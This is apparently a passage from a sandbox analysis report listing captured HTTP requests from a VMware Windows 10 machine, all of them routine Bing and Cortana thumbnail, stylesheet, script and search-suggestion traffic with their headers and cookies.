SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9njb654d39wx_v9_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9p3610rr8qt5_v3_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OVFT.rEqSpACRbHxEvBRuQ9QDay&w=140&h=96&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OVFT.NePeQDw61paIMwdNxJ2kZi&w=140&h=96&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OVFT.te3K-yA6UFG4MP-xpGUcwy&w=140&h=96&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OVFT.vbzuyQpOqWrMEqoQSF4Wji&w=140&h=96&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OHR.RockRiverFalls_ROW9398171921_1920x1080.jpg&w=392&h=221&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OBTQ.BTF15AE085C2DF53A3C31C1D61D3EE65060F37AED1553F347BBDBA6446B2C32A52&w=190&h=154&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9mzbzsnqx1bs_v4_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OVFT.2neW9QsXw2WP28snPBqr2S&w=140&h=96&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=ODSWG.737aeaaa-9d20-4a27-9560-801ca86571ea&pid=dsb HTTP/1.1host: www.bing.comx-positionertype: Desktopx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderateaccept-encoding: identityx-device-machineid: {E1FC8648-BDDC-4041-95D0-3C283137B766}x-userageclass: Unknownx-bm-market: CHx-bm-dateformat: dd/MM/yyyyx-device-ossku: 48x-bm-dtz: -240x-deviceid: 01000A410900D818x-bm-windowsflights: FX:119E26AD,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-bm-devicescale: 100x-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-device-manufacturer: VMware, Inc.x-bm-theme: 000000;0078d7x-bm-devicedimensionslogical: 784x640x-bm-devicedimensions: 784x640x-agent-deviceid: 01000A410900D818x-device-product: VMware20,1x-bm-cbt: 1760683968user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045x-device-isoptin: falseaccept-language: en-GB, en, en-USx-device-touch: falsex-device-clientsession: 3FE2546F8B2E4651A826AD6E56EED946x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIcookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=S
Source: global traffic	HTTP traffic detected: GET /th?id=OVFT.iUxXLwKOL4aRmwuwzANxFC&w=140&h=96&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rb/17/jnc,nj/hffFrCoBbPJIwblTToAHW_0ukgE.js?bu=DiYtd5ABlwGaAYsBfoIBxAHHAS28AcoB&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C5wIygOVBOQI8wfpB6MGZ2dnZw&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=run&setlang=en-CH&cc=CH&nohs=1&qfm=1&seahisoff=1&cp=3&cvid=7381fb06e0214b5993b84b2d7aeaf562&ig=313453f10cb54ff68d37fb3533327198 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A410900D818x-bm-cbt: 1742302773x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x984x-bm-devicedimensionslogical: 784x984x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 09100D986E1E42B291BE10116DFD7800x-device-isoptin: falsex-device-machineid: {E1FC8648-BDDC-4041-95D0-3C283137B766}x-device-manufacturer: VMware, Inc.x-device-ossku: 48x-device-product: VMware20,1x-device-touch: falsex-deviceid: 01000A410900D818x-msedge-externalexp: d-thshld39,d-thshld42,miniserp38ir,mslogoscopetf,psduc,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderate
Source: global traffic	HTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-gCT9IC3QFnZ-8C&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rb/3E/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rb/6g/cir3,ortl,cc,nc/q9zRcnkmhAblVHIIkjOqmGKO-8Q.css?bu=Md4K1wrkCtcKzQvXCtML1wrcC9cK4gvXCugL1wruC9cK9AvXCvYK1wr8CtcK8ArXCtcKxAvXCosL1wqRC9cKhQvXCqELpAvXCtcKwQurC9cKtQu4C9cK1wrXCvoL1wqjDdcK&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
